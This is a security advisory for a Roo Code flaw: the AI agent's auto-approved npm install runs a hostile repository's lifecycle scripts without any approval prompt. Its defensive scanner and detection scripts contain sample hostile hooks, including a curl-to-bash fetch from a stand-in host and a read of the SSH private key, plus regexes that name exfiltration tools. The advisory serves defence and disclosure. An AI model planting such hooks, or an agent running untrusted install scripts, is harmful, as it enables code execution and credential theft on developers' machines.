CVE-2025-58374 Overview
Roo Code is an AI-powered autonomous coding agent that integrates into developer editors. Versions 3.25.23 and below ship with a default allowlist of commands that run without manual approval when the auto-approve feature is enabled. That allowlist includes npm install, which executes the npm lifecycle scripts (preinstall, install, postinstall) declared in the project's package.json. An attacker who controls a repository's package.json can therefore plant a malicious postinstall script that runs as soon as Roo Code invokes npm install on the project, with no approval prompt. The result is arbitrary local code execution under the developer's account. The issue is fixed in version 3.26.0 and is tracked as [CWE-78].
Critical Impact
With auto-approve enabled, opening a malicious repository and letting the agent run npm install on it executes attacker-controlled code on the developer's workstation. The only user interaction is opening the project; the npm install step itself is never presented for approval.
Affected Products
- Roo Code versions 3.25.23 and earlier
- Roo Code VS Code extension (autonomous coding agent)
- Fixed in Roo Code version 3.26.0
Discovery Timeline
- 2025-09-06 - CVE-2025-58374 published to NVD
- 2025-09-15 - Last updated in NVD database
Technical Details for CVE-2025-58374
Vulnerability Analysis
The vulnerability stems from an insecure default configuration in Roo Code's auto-approve command allowlist. When auto-approve is enabled, commands matching the default allowlist execute without prompting the user. The allowlist includes npm install, a command that does far more than dependency resolution: npm runs the lifecycle hooks preinstall, install, and postinstall declared in the project's package.json, and the same hooks in every dependency it installs. Each hook is an arbitrary shell command string chosen by the package author. An attacker who publishes a repository containing a hostile postinstall script (or a dependency carrying one) therefore achieves code execution the moment Roo Code auto-runs npm install on the project. The payload runs with the privileges of the editor process, which on a typical workstation means access to source code, credentials, SSH keys, and cloud tokens.
Root Cause
The advisory classifies the issue as [CWE-78]. The underlying mistake is treating npm install as a safe, side-effect-free dependency fetch. Because npm executes lifecycle scripts from package.json, npm install is in practice a generic code execution primitive controlled by whoever controls the repository contents, and auto-approving it is equivalent to auto-approving any shell command.
Attack Vector
Exploitation requires the user to open an untrusted repository in an editor running Roo Code with auto-approve enabled; the npm install step itself is never presented for approval. An attacker hosts a repository whose package.json carries a malicious postinstall entry and convinces a target to clone or open it. When the agent invokes npm install, npm executes the lifecycle hook and the attacker payload runs locally. No verified public proof-of-concept code is published; see the GitHub Security Advisory GHSA-c292-qxq4-4p2v and the associated pull request on GitHub for fix details.
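As an added illustration (not code from Roo Code, npm, or the advisory), the following Node script resolves which package.json hooks npm install would execute for the opened project, in the order the npm scripts documentation gives, and shows how the --ignore-scripts flag empties that list. The package.json is constructed for the example and its postinstall is a harmless echo.

```javascript
// Added example (not Roo Code's, npm's, or the advisory's code): resolve which
// package.json lifecycle hooks `npm install` would execute, in npm's documented
// order, and show what --ignore-scripts changes. Hook lists follow the npm
// "scripts" documentation for the root project and for installed dependencies.

// Hooks npm runs, in order, for `npm install` with no arguments inside a
// package directory, i.e. the project the agent has just opened.
const ROOT_INSTALL_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare',
];

// Hooks npm runs for each dependency it installs (git dependencies also get
// `prepare`, which this example does not model).
const DEPENDENCY_INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Return the ordered [hook, command] pairs that would execute for this
// package.json text. `role` is 'root' or 'dependency'; `ignoreScripts`
// mirrors npm's ignore-scripts config key / --ignore-scripts flag.
function installHooks(packageJsonText, { role = 'root', ignoreScripts = false } = {}) {
  if (ignoreScripts) return [];
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg && pkg.scripts && typeof pkg.scripts === 'object' ? pkg.scripts : {};
  const order = role === 'dependency' ? DEPENDENCY_INSTALL_HOOKS : ROOT_INSTALL_HOOKS;
  return order
    .filter((hook) => typeof scripts[hook] === 'string' && scripts[hook].trim() !== '')
    .map((hook) => [hook, scripts[hook]]);
}

// Constructed package.json standing in for an attacker-controlled repository.
// The postinstall payload is a harmless echo; npm would hand any string here
// to the shell (`sh -c` on POSIX, cmd.exe on Windows) in exactly the same way.
const HOSTILE_PACKAGE_JSON = JSON.stringify({
  name: 'demo-app',
  version: '1.0.0',
  scripts: {
    build: 'tsc', // not a lifecycle hook: never run by npm install
    postinstall: 'echo "code runs here" > /tmp/roo-demo-marker',
  },
  dependencies: {},
});

// What the agent's auto-approved `npm install` would run versus the hardened form.
function demo() {
  return {
    plainInstall: installHooks(HOSTILE_PACKAGE_JSON),
    ignoreScriptsInstall: installHooks(HOSTILE_PACKAGE_JSON, { ignoreScripts: true }),
  };
}

const demoResult = demo();
console.log('npm install would run:', demoResult.plainInstall);
console.log('npm install --ignore-scripts would run:', demoResult.ignoreScriptsInstall);
```

The `build` entry is there to make the point that npm install only executes the lifecycle hooks, not every script in the file; conversely, any string in a hook slot is executed, whether or not it looks like a build step.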
Detection Methods for CVE-2025-58374
Indicators of Compromise
- Unexpected child processes spawned by node, npm, or the editor process shortly after a repository is opened
- New or modified files in user home directories, shell profiles (.bashrc, .zshrc), or SSH directories following npm install execution
- Outbound network connections from node processes to unfamiliar domains during dependency installation
- Presence of preinstall, install, or postinstall scripts in package.json files within untrusted repositories (common in legitimate projects too, so treat this as a triage signal rather than a conviction)
Detection Strategies
- Monitor process trees where editor or Roo Code agent processes spawn npm followed by shell interpreters such as bash, sh, cmd.exe, or powershell.exe
- Alert on Roo Code extension versions at or below 3.25.23 reported in software inventory feeds
- Inspect repositories cloned by developers for lifecycle scripts that invoke network utilities, base64 decoding, or credential paths
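The repository inspection described above, as an added example rather than tooling from Roo Code or the advisory: a Node script that parses package.json, looks only at the hooks npm install actually runs, and labels each one with the suspicious patterns it matches (network utilities, base64 decoding, credential paths, inline interpreters, shell-profile writes). The rule set and both sample documents are constructed for the example.

```javascript
// Added example (not from Roo Code, npm, or the advisory): a triage scanner
// for package.json lifecycle scripts. It flags the patterns listed above
// (network utilities, base64 decoding, credential paths) plus inline
// interpreters and shell-profile writes. The rules are illustrative starting
// points, not a vetted signature set, and non-hook scripts such as "test" or
// "build" are deliberately ignored because npm install never runs them.

const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall',
  'prepublish', 'preprepare', 'prepare', 'postprepare',
]);

// Each rule is a label plus a case-insensitive pattern tested against the script text.
const RULES = [
  { label: 'network-utility',
    re: /\b(curl|wget|nc|ncat|netcat|Invoke-WebRequest|iwr)\b/i },
  { label: 'base64-decode',
    re: /base64\s+(-d|--decode)\b|FromBase64String|from\([^)]*['"]base64['"]\s*\)/i },
  { label: 'credential-path',
    re: /(~|\$HOME|%USERPROFILE%)[\\/]\.(ssh|aws|docker|kube)\b|\.aws[\\/]credentials|\.npmrc|\.git-credentials|id_rsa|id_ed25519/i },
  { label: 'inline-interpreter',
    re: /\b(node\s+-e|python3?\s+-c|bash\s+-c|sh\s+-c|eval)\b/i },
  { label: 'shell-profile',
    re: /\.(bashrc|zshrc|bash_profile|profile)\b/i },
];

// Scan one package.json document. Returns one finding per lifecycle hook that
// matches at least one rule: { hook, command, labels }. Unparseable input is
// itself reported, since a repository that ships a broken package.json is
// worth a look rather than a silent skip.
function scanPackageJson(text) {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (err) {
    return [{ hook: null, command: null, labels: ['unparseable-json'] }];
  }
  const scripts = pkg && pkg.scripts && typeof pkg.scripts === 'object' ? pkg.scripts : {};
  const findings = [];
  for (const [hook, command] of Object.entries(scripts)) {
    if (!LIFECYCLE_HOOKS.has(hook) || typeof command !== 'string') continue;
    const labels = RULES.filter((rule) => rule.re.test(command)).map((rule) => rule.label);
    if (labels.length > 0) findings.push({ hook, command, labels });
  }
  return findings;
}

// Constructed samples: one hostile, one ordinary.
const SUSPICIOUS_PACKAGE_JSON = JSON.stringify({
  name: 'demo-app',
  scripts: {
    postinstall: 'curl -s https://example.invalid/p.sh | bash',
    preinstall: 'node -e "require(\'fs\').readFileSync(process.env.HOME + \'/.ssh/id_rsa\')"',
    test: 'curl https://example.invalid/ping', // not a lifecycle hook, so not reported
  },
});
const BENIGN_PACKAGE_JSON = JSON.stringify({
  name: 'ordinary-app',
  scripts: { postinstall: 'husky install', build: 'tsc' },
});

for (const [name, doc] of [['suspicious', SUSPICIOUS_PACKAGE_JSON], ['benign', BENIGN_PACKAGE_JSON]]) {
  console.log(name, JSON.stringify(scanPackageJson(doc)));
}
```

Run it over every package.json in a freshly cloned tree (including those under node_modules after an install) and review anything it labels; a clean result does not prove a repository safe, it only means none of these patterns appeared.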
Monitoring Recommendations
- Collect endpoint process telemetry covering parent-child relationships for node and npm executions on developer workstations
- Forward editor extension version inventories to centralized logging for version-based detection
- Track outbound DNS and HTTP traffic from developer machines during initial repository setup events
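The process-tree rule described in the detection and monitoring notes above, as an added example that is not from Roo Code or any endpoint product: given process-creation telemetry, alert on every shell interpreter whose ancestry runs shell, then an npm install, then (anywhere above) an editor process. The event schema ({ pid, ppid, image, cmdline }), the editor and shell names, and the sample telemetry are assumptions constructed for the example.

```javascript
// Added example (not from Roo Code or any EDR product): process-tree detection
// over constructed endpoint telemetry. It raises an alert for every shell
// interpreter whose ancestry runs shell <- npm install <- ... <- editor, the
// chain a lifecycle-script payload produces. The event schema
// ({ pid, ppid, image, cmdline }) and the process names are assumptions.

const EDITORS = new Set(['code', 'code.exe', 'code-insiders', 'codium', 'cursor', 'cursor.exe']);
const NPM_LAUNCHERS = new Set(['npm', 'npm.cmd', 'node', 'node.exe']);
const SHELLS = new Set(['sh', 'bash', 'zsh', 'dash', 'cmd.exe', 'powershell.exe', 'pwsh', 'pwsh.exe']);
// npm on Linux runs as `node .../npm-cli.js install`, so match on the command line, not the image.
const NPM_INSTALL_CMD = /\bnpm\b.*\b(install|i|ci)\b/i;

function basename(imagePath) {
  return imagePath.split(/[\\/]/).pop().toLowerCase();
}

// events: array of { pid, ppid, image, cmdline }. Returns alerts of the form
// { shellPid, cmdline, chain } where chain lists image basenames root-first.
function detectEditorNpmShell(events, maxDepth = 16) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const alerts = [];
  for (const ev of events) {
    if (!SHELLS.has(basename(ev.image))) continue;
    const chain = [ev];
    let sawNpmInstall = false;
    let cur = byPid.get(ev.ppid);
    while (cur && chain.length < maxDepth) {
      chain.push(cur);
      const name = basename(cur.image);
      if (!sawNpmInstall && NPM_LAUNCHERS.has(name) && NPM_INSTALL_CMD.test(cur.cmdline)) {
        sawNpmInstall = true; // the shell is a child of an npm install, keep climbing for the editor
      } else if (sawNpmInstall && EDITORS.has(name)) {
        alerts.push({
          shellPid: ev.pid,
          cmdline: ev.cmdline,
          chain: chain.map((c) => basename(c.image)).reverse(),
        });
        break;
      }
      cur = byPid.get(cur.ppid);
    }
  }
  return alerts;
}

// Constructed telemetry: an editor whose integrated terminal runs an
// auto-approved npm install (hostile postinstall), the same editor running an
// ordinary build, and a developer running npm install from a plain terminal.
const SAMPLE_EVENTS = [
  { pid: 100, ppid: 1,   image: '/usr/share/code/code',    cmdline: 'code /home/dev/untrusted-repo' },
  { pid: 120, ppid: 100, image: '/bin/bash',               cmdline: 'bash' },
  { pid: 130, ppid: 120, image: '/usr/bin/node',           cmdline: 'node /usr/lib/node_modules/npm/bin/npm-cli.js install' },
  { pid: 140, ppid: 130, image: '/bin/sh',                 cmdline: 'sh -c curl -s https://example.invalid/p.sh -o /tmp/p' },
  { pid: 150, ppid: 140, image: '/usr/bin/curl',           cmdline: 'curl -s https://example.invalid/p.sh -o /tmp/p' },
  { pid: 160, ppid: 120, image: '/usr/bin/node',           cmdline: 'node /usr/lib/node_modules/npm/bin/npm-cli.js run build' },
  { pid: 170, ppid: 160, image: '/bin/sh',                 cmdline: 'sh -c tsc' },
  { pid: 200, ppid: 1,   image: '/usr/bin/gnome-terminal', cmdline: 'gnome-terminal' },
  { pid: 210, ppid: 200, image: '/bin/bash',               cmdline: 'bash' },
  { pid: 220, ppid: 210, image: '/usr/bin/node',           cmdline: 'node /usr/lib/node_modules/npm/bin/npm-cli.js install' },
  { pid: 230, ppid: 220, image: '/bin/sh',                 cmdline: 'sh -c node-gyp rebuild' },
];

console.log(JSON.stringify(detectEditorNpmShell(SAMPLE_EVENTS), null, 2));
```

Only pid 140 alerts: the integrated-terminal bash (pid 120) has no npm install below it, the build's shell (pid 170) sits under npm run rather than npm install, and the plain-terminal install (pids 200 to 230) has no editor ancestor. Tune the editor and shell sets to the fleet's actual binaries; on Windows the chain typically passes through npm.cmd and cmd.exe wrappers, which the ancestry walk tolerates.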
How to Mitigate CVE-2025-58374
Immediate Actions Required
- Upgrade Roo Code to version 3.26.0 or later on all developer workstations
- Disable the auto-approve commands feature until the upgrade is confirmed across the environment
- Audit existing repositories opened with auto-approve enabled for suspicious lifecycle scripts and signs of post-exploitation activity
- Rotate credentials, tokens, and SSH keys accessible from any workstation that opened untrusted repositories with vulnerable Roo Code versions
Patch Information
The fix is available in Roo Code release v3.26.0. The maintainers removed npm install from the default auto-approve allowlist, as documented in the associated pull request on GitHub and the GitHub Security Advisory GHSA-c292-qxq4-4p2v.
Workarounds
- Disable auto-approve entirely in Roo Code settings and require manual confirmation for every command
- Remove npm install and similar package manager commands from any custom auto-approve allowlist (npm ci and the install commands of yarn and pnpm also run lifecycle scripts)
- Run editors and Roo Code inside isolated development containers or virtual machines with no access to production credentials
- Configure npm to skip lifecycle scripts with npm config set ignore-scripts true on workstations that handle untrusted code. Note the trade-offs: this also skips legitimate hooks (native addon builds via node-gyp, husky and similar prepare steps), it does not stop npm run <script> itself (only that script's pre and post hooks), and because npm reads a per-project .npmrc with higher precedence than the per-user file, a repository can ship its own .npmrc; the --ignore-scripts command-line flag overrides both.
# Configuration example
# Per-user default (written to ~/.npmrc): skip lifecycle scripts on every npm invocation
npm config set ignore-scripts true
# Per-invocation flag: overrides any per-project or per-user .npmrc setting
npm install --ignore-scripts
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.